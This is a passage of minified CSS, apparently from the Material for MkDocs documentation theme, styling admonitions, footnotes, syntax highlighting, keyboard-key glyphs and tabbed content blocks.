')}.md-typeset .admonition,.md-typeset details{background-color:var(--md-admonition-bg-color);border:.05rem solid #448aff;border-radius:.2rem;box-shadow:var(--md-shadow-z1);color:var(--md-admonition-fg-color);display:flow-root;font-size:.64rem;margin:1.5625em 0;padding:0 .6rem;page-break-inside:avoid}@media print{.md-typeset .admonition,.md-typeset details{box-shadow:none}}.md-typeset .admonition>*,.md-typeset details>*{box-sizing:border-box}.md-typeset .admonition .admonition,.md-typeset .admonition details,.md-typeset details .admonition,.md-typeset details details{margin-bottom:1em;margin-top:1em}.md-typeset .admonition .md-typeset__scrollwrap,.md-typeset details .md-typeset__scrollwrap{margin:1em -.6rem}.md-typeset .admonition .md-typeset__table,.md-typeset details .md-typeset__table{padding:0 .6rem}.md-typeset .admonition>.tabbed-set:only-child,.md-typeset details>.tabbed-set:only-child{margin-top:0}html .md-typeset .admonition>:last-child,html .md-typeset details>:last-child{margin-bottom:.6rem}[dir=ltr] .md-typeset .admonition-title,[dir=ltr] .md-typeset summary{padding-left:2rem;padding-right:.6rem}[dir=rtl] .md-typeset .admonition-title,[dir=rtl] .md-typeset summary{padding-left:.6rem;padding-right:2rem}[dir=ltr] .md-typeset .admonition-title,[dir=ltr] .md-typeset summary{border-left-width:.2rem}[dir=rtl] .md-typeset .admonition-title,[dir=rtl] .md-typeset summary{border-right-width:.2rem}[dir=ltr] .md-typeset .admonition-title,[dir=ltr] .md-typeset summary{border-top-left-radius:.1rem}[dir=ltr] .md-typeset .admonition-title,[dir=ltr] .md-typeset summary,[dir=rtl] .md-typeset .admonition-title,[dir=rtl] .md-typeset summary{border-top-right-radius:.1rem}[dir=rtl] .md-typeset .admonition-title,[dir=rtl] .md-typeset summary{border-top-left-radius:.1rem}.md-typeset .admonition-title,.md-typeset summary{background-color:#448aff1a;border:none;font-weight:700;margin:0 -.6rem;padding-bottom:.4rem;padding-top:.4rem;position:relative}html .md-typeset .admonition-title:last-child,html .md-typeset summary:last-child{margin-bottom:0}[dir=ltr] .md-typeset .admonition-title:before,[dir=ltr] .md-typeset summary:before{left:.6rem}[dir=rtl] .md-typeset .admonition-title:before,[dir=rtl] .md-typeset summary:before{right:.6rem}.md-typeset .admonition-title:before,.md-typeset summary:before{background-color:#448aff;content:"";height:1rem;-webkit-mask-image:var(--md-admonition-icon--note);mask-image:var(--md-admonition-icon--note);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;position:absolute;top:.625em;width:1rem}.md-typeset .admonition-title code,.md-typeset summary code{box-shadow:0 0 0 .05rem var(--md-default-fg-color--lightest)}.md-typeset .admonition.note,.md-typeset details.note{border-color:#448aff}.md-typeset .note>.admonition-title,.md-typeset .note>summary{background-color:#448aff1a}.md-typeset .note>.admonition-title:before,.md-typeset .note>summary:before{background-color:#448aff;-webkit-mask-image:var(--md-admonition-icon--note);mask-image:var(--md-admonition-icon--note)}.md-typeset .note>.admonition-title:after,.md-typeset .note>summary:after{color:#448aff}.md-typeset .admonition.abstract,.md-typeset details.abstract{border-color:#00b0ff}.md-typeset .abstract>.admonition-title,.md-typeset .abstract>summary{background-color:#00b0ff1a}.md-typeset .abstract>.admonition-title:before,.md-typeset .abstract>summary:before{background-color:#00b0ff;-webkit-mask-image:var(--md-admonition-icon--abstract);mask-image:var(--md-admonition-icon--abstract)}.md-typeset .abstract>.admonition-title:after,.md-typeset .abstract>summary:after{color:#00b0ff}.md-typeset .admonition.info,.md-typeset details.info{border-color:#00b8d4}.md-typeset .info>.admonition-title,.md-typeset .info>summary{background-color:#00b8d41a}.md-typeset .info>.admonition-title:before,.md-typeset .info>summary:before{background-color:#00b8d4;-webkit-mask-image:var(--md-admonition-icon--info);mask-image:var(--md-admonition-icon--info)}.md-typeset .info>.admonition-title:after,.md-typeset .info>summary:after{color:#00b8d4}.md-typeset .admonition.tip,.md-typeset details.tip{border-color:#00bfa5}.md-typeset .tip>.admonition-title,.md-typeset .tip>summary{background-color:#00bfa51a}.md-typeset .tip>.admonition-title:before,.md-typeset .tip>summary:before{background-color:#00bfa5;-webkit-mask-image:var(--md-admonition-icon--tip);mask-image:var(--md-admonition-icon--tip)}.md-typeset .tip>.admonition-title:after,.md-typeset .tip>summary:after{color:#00bfa5}.md-typeset .admonition.success,.md-typeset details.success{border-color:#00c853}.md-typeset .success>.admonition-title,.md-typeset .success>summary{background-color:#00c8531a}.md-typeset .success>.admonition-title:before,.md-typeset .success>summary:before{background-color:#00c853;-webkit-mask-image:var(--md-admonition-icon--success);mask-image:var(--md-admonition-icon--success)}.md-typeset .success>.admonition-title:after,.md-typeset .success>summary:after{color:#00c853}.md-typeset .admonition.question,.md-typeset details.question{border-color:#64dd17}.md-typeset .question>.admonition-title,.md-typeset .question>summary{background-color:#64dd171a}.md-typeset .question>.admonition-title:before,.md-typeset .question>summary:before{background-color:#64dd17;-webkit-mask-image:var(--md-admonition-icon--question);mask-image:var(--md-admonition-icon--question)}.md-typeset .question>.admonition-title:after,.md-typeset .question>summary:after{color:#64dd17}.md-typeset .admonition.warning,.md-typeset details.warning{border-color:#ff9100}.md-typeset .warning>.admonition-title,.md-typeset .warning>summary{background-color:#ff91001a}.md-typeset .warning>.admonition-title:before,.md-typeset .warning>summary:before{background-color:#ff9100;-webkit-mask-image:var(--md-admonition-icon--warning);mask-image:var(--md-admonition-icon--warning)}.md-typeset .warning>.admonition-title:after,.md-typeset .warning>summary:after{color:#ff9100}.md-typeset .admonition.failure,.md-typeset details.failure{border-color:#ff5252}.md-typeset .failure>.admonition-title,.md-typeset .failure>summary{background-color:#ff52521a}.md-typeset .failure>.admonition-title:before,.md-typeset .failure>summary:before{background-color:#ff5252;-webkit-mask-image:var(--md-admonition-icon--failure);mask-image:var(--md-admonition-icon--failure)}.md-typeset .failure>.admonition-title:after,.md-typeset .failure>summary:after{color:#ff5252}.md-typeset .admonition.danger,.md-typeset details.danger{border-color:#ff1744}.md-typeset .danger>.admonition-title,.md-typeset .danger>summary{background-color:#ff17441a}.md-typeset .danger>.admonition-title:before,.md-typeset .danger>summary:before{background-color:#ff1744;-webkit-mask-image:var(--md-admonition-icon--danger);mask-image:var(--md-admonition-icon--danger)}.md-typeset .danger>.admonition-title:after,.md-typeset .danger>summary:after{color:#ff1744}.md-typeset .admonition.bug,.md-typeset details.bug{border-color:#f50057}.md-typeset .bug>.admonition-title,.md-typeset .bug>summary{background-color:#f500571a}.md-typeset .bug>.admonition-title:before,.md-typeset .bug>summary:before{background-color:#f50057;-webkit-mask-image:var(--md-admonition-icon--bug);mask-image:var(--md-admonition-icon--bug)}.md-typeset .bug>.admonition-title:after,.md-typeset .bug>summary:after{color:#f50057}.md-typeset .admonition.example,.md-typeset details.example{border-color:#7c4dff}.md-typeset .example>.admonition-title,.md-typeset .example>summary{background-color:#7c4dff1a}.md-typeset .example>.admonition-title:before,.md-typeset .example>summary:before{background-color:#7c4dff;-webkit-mask-image:var(--md-admonition-icon--example);mask-image:var(--md-admonition-icon--example)}.md-typeset .example>.admonition-title:after,.md-typeset .example>summary:after{color:#7c4dff}.md-typeset .admonition.quote,.md-typeset details.quote{border-color:#9e9e9e}.md-typeset .quote>.admonition-title,.md-typeset .quote>summary{background-color:#9e9e9e1a}.md-typeset .quote>.admonition-title:before,.md-typeset .quote>summary:before{background-color:#9e9e9e;-webkit-mask-image:var(--md-admonition-icon--quote);mask-image:var(--md-admonition-icon--quote)}.md-typeset .quote>.admonition-title:after,.md-typeset .quote>summary:after{color:#9e9e9e}:root{--md-footnotes-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset .footnote{color:var(--md-default-fg-color--light);font-size:.64rem}[dir=ltr] .md-typeset .footnote>ol{margin-left:0}[dir=rtl] .md-typeset .footnote>ol{margin-right:0}.md-typeset .footnote>ol>li{transition:color 125ms}.md-typeset .footnote>ol>li:target{color:var(--md-default-fg-color)}.md-typeset .footnote>ol>li:focus-within .footnote-backref{opacity:1;transform:translateX(0);transition:none}.md-typeset .footnote>ol>li:hover .footnote-backref,.md-typeset .footnote>ol>li:target .footnote-backref{opacity:1;transform:translateX(0)}.md-typeset .footnote>ol>li>:first-child{margin-top:0}.md-typeset .footnote-ref{font-size:.75em;font-weight:700}html .md-typeset .footnote-ref{outline-offset:.1rem}.md-typeset [id^="fnref:"]:target>.footnote-ref{outline:auto}.md-typeset .footnote-backref{color:var(--md-typeset-a-color);display:inline-block;font-size:0;opacity:0;transform:translateX(.25rem);transition:color .25s,transform .25s .25s,opacity 125ms .25s;vertical-align:text-bottom}@media print{.md-typeset .footnote-backref{color:var(--md-typeset-a-color);opacity:1;transform:translateX(0)}}[dir=rtl] .md-typeset .footnote-backref{transform:translateX(-.25rem)}.md-typeset .footnote-backref:hover{color:var(--md-accent-fg-color)}.md-typeset .footnote-backref:before{background-color:currentcolor;content:"";display:inline-block;height:.8rem;-webkit-mask-image:var(--md-footnotes-icon);mask-image:var(--md-footnotes-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:.8rem}[dir=rtl] .md-typeset .footnote-backref:before svg{transform:scaleX(-1)}[dir=ltr] .md-typeset .headerlink{margin-left:.5rem}[dir=rtl] .md-typeset .headerlink{margin-right:.5rem}.md-typeset .headerlink{color:var(--md-default-fg-color--lighter);display:inline-block;opacity:0;transition:color .25s,opacity 125ms}@media print{.md-typeset .headerlink{display:none}}.md-typeset .headerlink:focus,.md-typeset :hover>.headerlink,.md-typeset :target>.headerlink{opacity:1;transition:color .25s,opacity 125ms}.md-typeset .headerlink:focus,.md-typeset .headerlink:hover,.md-typeset :target>.headerlink{color:var(--md-accent-fg-color)}.md-typeset :target{--md-scroll-margin:3.6rem;--md-scroll-offset:0rem;scroll-margin-top:calc(var(--md-scroll-margin) - var(--md-scroll-offset))}@media screen and (min-width:76.25em){.md-header--lifted~.md-container .md-typeset :target{--md-scroll-margin:6rem}}.md-typeset h1:target,.md-typeset h2:target,.md-typeset h3:target{--md-scroll-offset:0.2rem}.md-typeset h4:target{--md-scroll-offset:0.15rem}.md-typeset div.arithmatex{overflow:auto}@media screen and (max-width:44.9375em){.md-typeset div.arithmatex{margin:0 -.8rem}}.md-typeset div.arithmatex>*{margin-left:auto!important;margin-right:auto!important;padding:0 .8rem;touch-action:auto;width:-webkit-min-content;width:min-content}.md-typeset div.arithmatex>* mjx-container{margin:0!important}.md-typeset del.critic{background-color:var(--md-typeset-del-color)}.md-typeset del.critic,.md-typeset ins.critic{-webkit-box-decoration-break:clone;box-decoration-break:clone}.md-typeset ins.critic{background-color:var(--md-typeset-ins-color)}.md-typeset .critic.comment{-webkit-box-decoration-break:clone;box-decoration-break:clone;color:var(--md-code-hl-comment-color)}.md-typeset .critic.comment:before{content:"/* "}.md-typeset .critic.comment:after{content:" */"}.md-typeset .critic.block{box-shadow:none;display:block;margin:1em 0;overflow:auto;padding-left:.8rem;padding-right:.8rem}.md-typeset .critic.block>:first-child{margin-top:.5em}.md-typeset .critic.block>:last-child{margin-bottom:.5em}:root{--md-details-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset details{display:flow-root;overflow:visible;padding-top:0}.md-typeset details[open]>summary:after{transform:rotate(90deg)}.md-typeset details:not([open]){box-shadow:none;padding-bottom:0}.md-typeset details:not([open])>summary{border-radius:.1rem}[dir=ltr] .md-typeset summary{padding-right:1.8rem}[dir=rtl] .md-typeset summary{padding-left:1.8rem}[dir=ltr] .md-typeset summary{border-top-left-radius:.1rem}[dir=ltr] .md-typeset summary,[dir=rtl] .md-typeset summary{border-top-right-radius:.1rem}[dir=rtl] .md-typeset summary{border-top-left-radius:.1rem}.md-typeset summary{cursor:pointer;display:block;min-height:1rem}.md-typeset summary.focus-visible{outline-color:var(--md-accent-fg-color);outline-offset:.2rem}.md-typeset summary:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}[dir=ltr] .md-typeset summary:after{right:.4rem}[dir=rtl] .md-typeset summary:after{left:.4rem}.md-typeset summary:after{background-color:currentcolor;content:"";height:1rem;-webkit-mask-image:var(--md-details-icon);mask-image:var(--md-details-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;position:absolute;top:.625em;transform:rotate(0deg);transition:transform .25s;width:1rem}[dir=rtl] .md-typeset summary:after{transform:rotate(180deg)}.md-typeset summary::marker{display:none}.md-typeset summary::-webkit-details-marker{display:none}.md-typeset .emojione,.md-typeset .gemoji,.md-typeset .twemoji{display:inline-flex;height:1.125em;vertical-align:text-top}.md-typeset .emojione svg,.md-typeset .gemoji svg,.md-typeset .twemoji svg{fill:currentcolor;max-height:100%;width:1.125em}.highlight .o,.highlight .ow{color:var(--md-code-hl-operator-color)}.highlight .p{color:var(--md-code-hl-punctuation-color)}.highlight .cpf,.highlight .l,.highlight .s,.highlight .s1,.highlight .s2,.highlight .sb,.highlight .sc,.highlight .si,.highlight .ss{color:var(--md-code-hl-string-color)}.highlight .cp,.highlight .se,.highlight .sh,.highlight .sr,.highlight .sx{color:var(--md-code-hl-special-color)}.highlight .il,.highlight .m,.highlight .mb,.highlight .mf,.highlight .mh,.highlight .mi,.highlight .mo{color:var(--md-code-hl-number-color)}.highlight .k,.highlight .kd,.highlight .kn,.highlight .kp,.highlight .kr,.highlight .kt{color:var(--md-code-hl-keyword-color)}.highlight .kc,.highlight .n{color:var(--md-code-hl-name-color)}.highlight .bp,.highlight .nb,.highlight .no{color:var(--md-code-hl-constant-color)}.highlight .nc,.highlight .ne,.highlight .nf,.highlight .nn{color:var(--md-code-hl-function-color)}.highlight .nd,.highlight .ni,.highlight .nl,.highlight .nt{color:var(--md-code-hl-keyword-color)}.highlight .c,.highlight .c1,.highlight .ch,.highlight .cm,.highlight .cs,.highlight .sd{color:var(--md-code-hl-comment-color)}.highlight .na,.highlight .nv,.highlight .vc,.highlight .vg,.highlight .vi{color:var(--md-code-hl-variable-color)}.highlight .ge,.highlight .gh,.highlight .go,.highlight .gp,.highlight .gr,.highlight .gs,.highlight .gt,.highlight .gu{color:var(--md-code-hl-generic-color)}.highlight .gd,.highlight .gi{border-radius:.1rem;margin:0 -.125em;padding:0 .125em}.highlight .gd{background-color:var(--md-typeset-del-color)}.highlight .gi{background-color:var(--md-typeset-ins-color)}.highlight .hll{background-color:var(--md-code-hl-color);display:block;margin:0 -1.1764705882em;padding:0 1.1764705882em}.highlight span.filename{background-color:var(--md-code-bg-color);border-bottom:.05rem solid var(--md-default-fg-color--lightest);border-top-left-radius:.1rem;border-top-right-radius:.1rem;display:flow-root;font-size:.85em;font-weight:700;margin-top:1em;padding:.6617647059em 1.1764705882em;position:relative}.highlight span.filename+pre{margin-top:0}.highlight span.filename+pre>code{border-top-left-radius:0;border-top-right-radius:0}.highlight [data-linenos]:before{background-color:var(--md-code-bg-color);box-shadow:-.05rem 0 var(--md-default-fg-color--lightest) inset;color:var(--md-default-fg-color--light);content:attr(data-linenos);float:left;left:-1.1764705882em;margin-left:-1.1764705882em;margin-right:1.1764705882em;padding-left:1.1764705882em;position:sticky;-webkit-user-select:none;-moz-user-select:none;user-select:none;z-index:3}.highlight code a[id]{position:absolute;visibility:hidden}.highlight code[data-md-copying] .hll{display:contents}.highlight code[data-md-copying] .md-annotation{display:none}.highlighttable{display:flow-root}.highlighttable tbody,.highlighttable td{display:block;padding:0}.highlighttable tr{display:flex}.highlighttable pre{margin:0}.highlighttable th.filename{flex-grow:1;padding:0;text-align:left}.highlighttable th.filename span.filename{margin-top:0}.highlighttable .linenos{background-color:var(--md-code-bg-color);border-bottom-left-radius:.1rem;border-top-left-radius:.1rem;font-size:.85em;padding:.7720588235em 0 .7720588235em 1.1764705882em;-webkit-user-select:none;-moz-user-select:none;user-select:none}.highlighttable .linenodiv{box-shadow:-.05rem 0 var(--md-default-fg-color--lightest) inset;padding-right:.5882352941em}.highlighttable .linenodiv pre{color:var(--md-default-fg-color--light);text-align:right}.highlighttable .code{flex:1;min-width:0}.linenodiv a{color:inherit}.md-typeset .highlighttable{direction:ltr;margin:1em 0}.md-typeset .highlighttable>tbody>tr>.code>div>pre>code{border-bottom-left-radius:0;border-top-left-radius:0}.md-typeset .highlight+.result{border:.05rem solid var(--md-code-bg-color);border-bottom-left-radius:.1rem;border-bottom-right-radius:.1rem;border-top-width:.1rem;margin-top:-1.125em;overflow:visible;padding:0 1em}.md-typeset .highlight+.result:after{clear:both;content:"";display:block}@media screen and (max-width:44.9375em){.md-content__inner>.highlight{margin:1em -.8rem}.md-content__inner>.highlight>.filename,.md-content__inner>.highlight>.highlighttable>tbody>tr>.code>div>pre>code,.md-content__inner>.highlight>.highlighttable>tbody>tr>.filename span.filename,.md-content__inner>.highlight>.highlighttable>tbody>tr>.linenos,.md-content__inner>.highlight>pre>code{border-radius:0}.md-content__inner>.highlight+.result{border-left-width:0;border-radius:0;border-right-width:0;margin-left:-.8rem;margin-right:-.8rem}}.md-typeset .keys kbd:after,.md-typeset .keys kbd:before{-moz-osx-font-smoothing:initial;-webkit-font-smoothing:initial;color:inherit;margin:0;position:relative}.md-typeset .keys span{color:var(--md-default-fg-color--light);padding:0 .2em}.md-typeset .keys .key-alt:before,.md-typeset .keys .key-left-alt:before,.md-typeset .keys .key-right-alt:before{content:"â‡";padding-right:.4em}.md-typeset .keys .key-command:before,.md-typeset .keys .key-left-command:before,.md-typeset .keys .key-right-command:before{content:"⌘";padding-right:.4em}.md-typeset .keys .key-control:before,.md-typeset .keys .key-left-control:before,.md-typeset .keys .key-right-control:before{content:"⌃";padding-right:.4em}.md-typeset .keys .key-left-meta:before,.md-typeset .keys .key-meta:before,.md-typeset .keys .key-right-meta:before{content:"â—†";padding-right:.4em}.md-typeset .keys .key-left-option:before,.md-typeset .keys .key-option:before,.md-typeset .keys .key-right-option:before{content:"⌥";padding-right:.4em}.md-typeset .keys .key-left-shift:before,.md-typeset .keys .key-right-shift:before,.md-typeset .keys .key-shift:before{content:"⇧";padding-right:.4em}.md-typeset .keys .key-left-super:before,.md-typeset .keys .key-right-super:before,.md-typeset .keys .key-super:before{content:"â–";padding-right:.4em}.md-typeset .keys .key-left-windows:before,.md-typeset .keys .key-right-windows:before,.md-typeset .keys .key-windows:before{content:"â";padding-right:.4em}.md-typeset .keys .key-arrow-down:before{content:"↓";padding-right:.4em}.md-typeset .keys .key-arrow-left:before{content:"â†";padding-right:.4em}.md-typeset .keys .key-arrow-right:before{content:"→";padding-right:.4em}.md-typeset .keys .key-arrow-up:before{content:"↑";padding-right:.4em}.md-typeset .keys .key-backspace:before{content:"⌫";padding-right:.4em}.md-typeset .keys .key-backtab:before{content:"⇤";padding-right:.4em}.md-typeset .keys .key-caps-lock:before{content:"⇪";padding-right:.4em}.md-typeset .keys .key-clear:before{content:"⌧";padding-right:.4em}.md-typeset .keys .key-context-menu:before{content:"☰";padding-right:.4em}.md-typeset .keys .key-delete:before{content:"⌦";padding-right:.4em}.md-typeset .keys .key-eject:before{content:"â";padding-right:.4em}.md-typeset .keys .key-end:before{content:"⤓";padding-right:.4em}.md-typeset .keys .key-escape:before{content:"â‹";padding-right:.4em}.md-typeset .keys .key-home:before{content:"⤒";padding-right:.4em}.md-typeset .keys .key-insert:before{content:"â€";padding-right:.4em}.md-typeset .keys .key-page-down:before{content:"⇟";padding-right:.4em}.md-typeset .keys .key-page-up:before{content:"â‡";padding-right:.4em}.md-typeset .keys .key-print-screen:before{content:"â™";padding-right:.4em}.md-typeset .keys .key-tab:after{content:"⇥";padding-left:.4em}.md-typeset .keys .key-num-enter:after{content:"⌤";padding-left:.4em}.md-typeset .keys .key-enter:after{content:"â";padding-left:.4em}:root{--md-tabbed-icon--prev:url('data:image/svg+xml;charset=utf-8,
');--md-tabbed-icon--next:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset .tabbed-set{border-radius:.1rem;display:flex;flex-flow:column wrap;margin:1em 0;position:relative}.md-typeset .tabbed-set>input{height:0;opacity:0;position:absolute;width:0}.md-typeset .tabbed-set>input:target{--md-scroll-offset:0.625em}.md-typeset .tabbed-labels{-ms-overflow-style:none;box-shadow:0 -.05rem var(--md-default-fg-color--lightest) inset;display:flex;max-width:100%;overflow:auto;scrollbar-width:none}@media print{.md-typeset .tabbed-labels{display:contents}}@media screen{.js .md-typeset .tabbed-labels{position:relative}.js .md-typeset .tabbed-labels:before{background:var(--md-accent-fg-color);bottom:0;content:"";display:block;height:2px;left:0;position:absolute;transform:translateX(var(--md-indicator-x));transition:width 225ms,transform .25s;transition-timing-function:cubic-bezier(.4,0,.2,1);width:var(--md-indicator-width)}}.md-typeset .tabbed-labels::-webkit-scrollbar{display:none}.md-typeset .tabbed-labels>label{border-bottom:.1rem solid #0000;border-radius:.1rem .1rem 0 0;color:var(--md-default-fg-color--light);cursor:pointer;flex-shrink:0;font-size:.64rem;font-weight:700;padding:.78125em 1.25em .625em;scroll-margin-inline-start:1rem;transition:background-color .25s,color .25s;white-space:nowrap;width:auto}@media print{.md-typeset .tabbed-labels>label:first-child{order:1}.md-typeset .tabbed-labels>label:nth-child(2){order:2}.md-typeset .tabbed-labels>label:nth-child(3){order:3}.md-typeset .tabbed-labels>label:nth-child(4){order:4}.md-typeset .tabbed-labels>label:nth-child(5){order:5}.md-typeset .tabbed-labels>label:nth-child(6){order:6}.md-typeset .tabbed-labels>label:nth-child(7){order:7}.md-typeset .tabbed-labels>label:nth-child(8){order:8}.md-typeset .tabbed-labels>label:nth-child(9){order:9}.md-typeset .tabbed-labels>label:nth-child(10){order:10}.md-typeset .tabbed-labels>label:nth-child(11){order:11}.md-typeset .tabbed-labels>label:nth-child(12){order:12}.md-typeset .tabbed-labels>label:nth-child(13){order:13}.md-typeset .tabbed-labels>label:nth-child(14){order:14}.md-typeset .tabbed-labels>label:nth-child(15){order:15}.md-typeset .tabbed-labels>label:nth-child(16){order:16}.md-typeset .tabbed-labels>label:nth-child(17){order:17}.md-typeset .tabbed-labels>label:nth-child(18){order:18}.md-typeset .tabbed-labels>label:nth-child(19){order:19}.md-typeset .tabbed-labels>label:nth-child(20){order:20}}.md-typeset .tabbed-labels>label:hover{color:var(--md-accent-fg-color)}.md-typeset .tabbed-content{width:100%}@media print{.md-typeset .tabbed-content{display:contents}}.md-typeset .tabbed-block{display:none}@media print{.md-typeset .tabbed-block{display:block}.md-typeset .tabbed-block:first-child{order:1}.md-typeset .tabbed-block:nth-child(2){order:2}.md-typeset .tabbed-block:nth-child(3){order:3}.md-typeset .tabbed-block:nth-child(4){order:4}.md-typeset .tabbed-block:nth-child(5){order:5}.md-typeset .tabbed-block:nth-child(6){order:6}.md-typeset .tabbed-block:nth-child(7){order:7}.md-typeset .tabbed-block:nth-child(8){order:8}.md-typeset .tabbed-block:nth-child(9){order:9}.md-typeset .tabbed-block:nth-child(10){order:10}.md-typeset .tabbed-block:nth-child(11){order:11}.md-typeset .tabbed-block:nth-child(12){order:12}.md-typeset .tabbed-block:nth-child(13){order:13}.md-typeset .tabbed-block:nth-child(14){order:14}.md-typeset .tabbed-block:nth-child(15){order:15}.md-typeset .tabbed-block:nth-child(16){order:16}.md-typeset .tabbed-block:nth-child(17){order:17}.md-typeset .tabbed-block:nth-child(18){order:18}.md-typeset .tabbed-block:nth-child(19){order:19}.md-typeset .tabbed-block:nth-child(20){order:20}}.md-typeset .tabbed-block>.highlight:first-child>pre,.md-typeset .tabbed-block>pre:first-child{margin:0}.md-typeset .tabbed-block>.highlight:first-child>pre>code,.md-typeset .tabbed-block>pre:first-child>code{border-top-left-radius:0;border-top-right-radius:0}.md-typeset .tabbed-block>.highlight:first-child>.filename{border-top-left-radius:0;border-top-right-radius:0;margin:0}.md-typeset .tabbed-block>.highlight:first-child>.highlighttable{margin:0}.md-typeset .tabbed-block>.highlight:first-child>.highlighttable>tbody>tr>.filename span.filename,.md-typeset .tabbed-block>.highlight:first-child>.highlighttable>tbody>tr>.linenos{border-top-left-radius:0;border-top-right-radius:0;margin:0}.md-typeset .tabbed-block>.highlight:first-child>.highlighttable>tbody>tr>.code>div>pre>code{border-top-left-radius:0;border-top-right-radius:0}.md-typeset .tabbed-block>.highlight:first-child+.result{margin-top:-.125em}.md-typeset .tabbed-block>.tabbed-set{margin:0}.md-typeset .tabbed-button{align-self:center;border-radius:100%;color:var(--md-default-fg-color--light);cursor:pointer;display:block;height:.9rem;margin-top:.1rem;pointer-events:auto;transition:background-color .25s;width:.9rem}.md-typeset .tabbed-button:hover{background-color:var(--md-accent-fg-color--transparent);color:var(--md-accent-fg-color)}.md-typeset .tabbed-button:after{background-color:currentcolor;content:"";display:block;height:100%;-webkit-mask-image:var(--md-tabbed-icon--prev);mask-image:var(--md-tabbed-icon--prev);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;transition:background-color .25s,transform .25s;width:100%}.md-typeset .tabbed-control{background:linear-gradient(to right,var(--md-default-bg-color) 60%,#0000);display:flex;height:1.9rem;justify-content:start;pointer-events:none;position:absolute;transition:opacity 125ms;width:1.2rem}[dir=rtl] .md-typeset .tabbed-control{transform:rotate(180deg)}.md-typeset .tabbed-control[hidden]{opacity:0}.md-typeset .tabbed-control--next{background:linear-gradient(to left,var(--md-default-bg-color) 60%,#0000);justify-content:end;right:0}.md-typeset .tabbed-control--next .tabbed-button:after{-webkit-mask-image:var(--md-tabbed-icon--next);mask-image:var(--md-tabbed-icon--next)}@media screen and (max-width:44.9375em){[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels{padding-left:.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels{padding-right:.8rem}.md-content__inner>.tabbed-set .tabbed-labels{margin:0 -.8rem;max-width:100vw;scroll-padding-inline-start:.8rem}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels:after{padding-right:.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels:after{padding-left:.8rem}.md-content__inner>.tabbed-set .tabbed-labels:after{content:""}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{padding-left:.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{padding-right:.8rem}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{margin-left:-.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{margin-right:-.8rem}.md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{width:2rem}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{padding-right:.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{padding-left:.8rem}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{margin-right:-.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{margin-left:-.8rem}.md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{width:2rem}}@media screen{.md-typeset .tabbed-set>input:first-child:checked~.tabbed-labels>:first-child,.md-typeset .tabbed-set>input:nth-child(10):checked~.tabbed-labels>:nth-child(10),.md-typeset .tabbed-set>input:nth-child(11):checked~.tabbed-labels>:nth-child(11),.md-typeset .tabbed-set>input:nth-child(12):checked~.tabbed-labels>:nth-child(12),.md-typeset .tabbed-set>input:nth-child(13):checked~.tabbed-labels>:nth-child(13),.md-typeset .tabbed-set>input:nth-child(14):checked~.tabbed-labels>:nth-child(14),.md-typeset .tabbed-set>input:nth-child(15):checked~.tabbed-labels>:nth-child(15),.md-typeset .tabbed-set>input:nth-child(16):checked~.tabbed-labels>:nth-child(16),.md-typeset .tabbed-set>input:nth-child(17):checked~.tabbed-labels>:nth-child(17),.md-typeset .tabbed-set>input:nth-child(18):checked~.tabbed-labels>:nth-child(18),.md-typeset .tabbed-set>input:nth-child(19):checked~.tabbed-labels>:nth-child(19),.md-typeset .tabbed-set>input:nth-child(2):checked~.tabbed-labels>:nth-child(2),.md-typeset .tabbed-set>input:nth-child(20):checked~.tabbed-labels>:nth-child(20),.md-typeset .tabbed-set>input:nth-child(3):checked~.tabbed-labels>:nth-child(3),.md-typeset .tabbed-set>input:nth-child(4):checked~.tabbed-labels>:nth-child(4),.md-typeset .tabbed-set>input:nth-child(5):checked~.tabbed-labels>:nth-child(5),.md-typeset .tabbed-set>input:nth-child(6):checked~.tabbed-labels>:nth-child(6),.md-typeset .tabbed-set>input:nth-child(7):checked~.tabbed-labels>:nth-child(7),.md-typeset .tabbed-set>input:nth-child(8):checked~.tabbed-labels>:nth-child(8),.md-typeset .tabbed-set>input:nth-child(9):checked~.tabbed-labels>:nth-child(9){color:var(--md-accent-fg-color)}.md-typeset .no-js .tabbed-set>input:first-child:checked~.tabbed-labels>:first-child,.md-typeset .no-js .tabbed-set>input:nth-child(10):checked~.tabbed-labels>:nth-child(10),.md-typeset .no-js .tabbed-set>input:nth-child(11):checked~.tabbed-labels>:nth-child(11),.md-typeset .no-js .tabbed-set>input:nth-child(12):checked~.tabbed-labels>:nth-child(12),.md-typeset .no-js .tabbed-set>input:nth-child(13):checked~.tabbed-labels>:nth-child(13),.md-typeset .no-js .tabbed-set>input:nth-child(14):checked~.tabbed-labels>:nth-child(14),.md-typeset .no-js .tabbed-set>input:nth-child(15):checked~.tabbed-labels>:nth-child(15),.md-typeset .no-js .tabbed-set>input:nth-child(16):checked~.tabbed-labels>:nth-child(16),.md-typeset .no-js .tabbed-set>input:nth-child(17):checked~.tabbed-labels>:nth-child(17),.md-typeset .no-js 